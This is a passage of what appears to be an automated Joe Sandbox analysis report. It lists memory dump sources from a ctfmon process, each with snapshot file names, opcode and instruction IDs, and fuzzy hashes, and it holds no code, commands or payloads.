• Instruction Fuzzy Hash: E0F0C83294E3C69FD3168FB088614E53FB4AF43211F2401FAD48A870A2D76D1656C762

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
• Instruction ID: 7c19a9ab5b9f8620aa5738e60adb201124ab84257a78ac954b717f71c882271c
• Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
• Instruction Fuzzy Hash: C4010074A1992D8FDFA8DB48C8A4BA8B7B1FB69301F1042D9C00EE3250DB319A84CF05

Memory Dump Source
• Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23c8cbdff8a2bb4944ec6f846205c0e8548194689d6eb5c0e553c45bc80e3029
• Instruction ID: 2146103d82f66d846e809dc8e25f44e06405fa52b87f62025f2494ebbdfffe57
• Opcode Fuzzy Hash: 23c8cbdff8a2bb4944ec6f846205c0e8548194689d6eb5c0e553c45bc80e3029
• Instruction Fuzzy Hash: 07F06D3090A6C98FDB62AF64C8696997FB0FF15304F0505EAE458C61A3EA78A554CB41

Memory Dump Source
• Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce634f6aad9be5587e31c62647311c0769f202efc7872fa24570c88208d82aab
• Instruction ID: 98cff4c78f6dfabedb0c67cdd1b1d1328002d6dd79656b57d3d930eb2a0b3011
• Opcode Fuzzy Hash: ce634f6aad9be5587e31c62647311c0769f202efc7872fa24570c88208d82aab
• Instruction Fuzzy Hash: D4F0F970A4461E8FEB68EB90C864AFCB7B1FB58354F000169C009E3691DF386A408B54

Memory Dump Source
• Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d853ea211e379c9d92108c48c31e764de35dfbe983604893a7c8d369127979e
• Instruction ID: ebcdacb3daeb9a4ddcfd672a5fd167962fd166c1bcb17dab5aff5f4beeee33e1
• Opcode Fuzzy Hash: 6d853ea211e379c9d92108c48c31e764de35dfbe983604893a7c8d369127979e
• Instruction Fuzzy Hash: 63F0DA70F0A39E8FEBB0DFE488543FCBBA1AF04744F620475D449D61A5DAB866449704

Memory Dump Source
• Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f2d085e057398c40cf7c490297a700ebfbc0531b0f313c0045ab48f9952b1aa7
• Instruction ID: 7ceed550eeb97724a58f27b891837c2e01fc14b9af0219f89a85795c3f5c2e17
• Opcode Fuzzy Hash: f2d085e057398c40cf7c490297a700ebfbc0531b0f313c0045ab48f9952b1aa7
• Instruction Fuzzy Hash: 2EE04F30A0494E8FDB54EF54D9012EA77B0FF58304F000525E85CC2185CA74A664CBC1

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5fbe7a750a5e6f2c953edbd7fab4cc7173efdaf208b3c8ffe21b81f262c560c
• Instruction ID: 0ee5950123da292fb5cfa0b44b70681f800b4cda204a60b73bbcfc2099b1117b
• Opcode Fuzzy Hash: e5fbe7a750a5e6f2c953edbd7fab4cc7173efdaf208b3c8ffe21b81f262c560c
• Instruction Fuzzy Hash: 22E0D836D1D3898BD771CB9084650EC7F70BF00380F1402E7E40A5A2D2EB2956489642

Memory Dump Source
• Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f4d68e76e02bdb19497f6a6f5ec291a13edf05229271d7dc3ed5d3deffc28415
• Instruction ID: a9dc62288515d24e0b65caa5b741f6f0edd45b6b871b6ff76a86c14502bea339
• Opcode Fuzzy Hash: f4d68e76e02bdb19497f6a6f5ec291a13edf05229271d7dc3ed5d3deffc28415
• Instruction Fuzzy Hash: 8BE0E630E5554DAAEB50FBB485596FD77F4FF18308F404876E41DD2191DA346294CB41

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
• Instruction ID: 077bb775a5986a90e91e96dd6f289b2f6dbb8e4c4c1e3234f644b1e7a5793930
• Opcode Fuzzy Hash: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
• Instruction Fuzzy Hash: E6E08C02F0D2C34BE77202B448704387BA08F073C67090BB9C1869A2C3E9583804931A

Memory Dump Source
• Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cb8a577312b785fbd8e0db3f97cedbf9eaadad0b9aa1f73666a4ad57fbb4d06
• Instruction ID: f9717349fa336a11aba78534043a4f70fbd30066209fe26079abebea37bc7b18
• Opcode Fuzzy Hash: 3cb8a577312b785fbd8e0db3f97cedbf9eaadad0b9aa1f73666a4ad57fbb4d06
• Instruction Fuzzy Hash: 14E08672F1861B4FFB289F94CC756FD2BA1FF5424CF100135D119562D6DE3839014644

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
• Instruction ID: 94801eac193d7e2443a07eab58621fd76a2fa920f9597cf1c460af62587603d8
• Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
• Instruction Fuzzy Hash: 15D0CA26F0EA5785F2394AC1807023EA9B18F013C3E36437EC09FA18C1EE2CB801661A

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40fd71155bf8aa623ff26884ea2e8547758b10ad2c9d9e98c40479dca39f208e
• Instruction ID: 1b002209ef7be5c419bf5a4c7633c93049b3921b0daab37d9ff689815da717cd
• Opcode Fuzzy Hash: 40fd71155bf8aa623ff26884ea2e8547758b10ad2c9d9e98c40479dca39f208e
• Instruction Fuzzy Hash: 20D0A902F0C05784F33A0682817023D11B05F01380E30033DD07FA08C3EC1C7C002A09

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e47307fefa87b0124977d75b241c853d96b4c827e4d892cbccbe62300d9df05e
• Instruction ID: bd8a08c3d415329ffad2599fd48d4140e4b05552207322ed3645b2177a9d139a
• Opcode Fuzzy Hash: e47307fefa87b0124977d75b241c853d96b4c827e4d892cbccbe62300d9df05e
• Instruction Fuzzy Hash: D5C04C15F0D2475BE73656F448B213C16A10F4B2447554771E26A9A1D3E8587C445255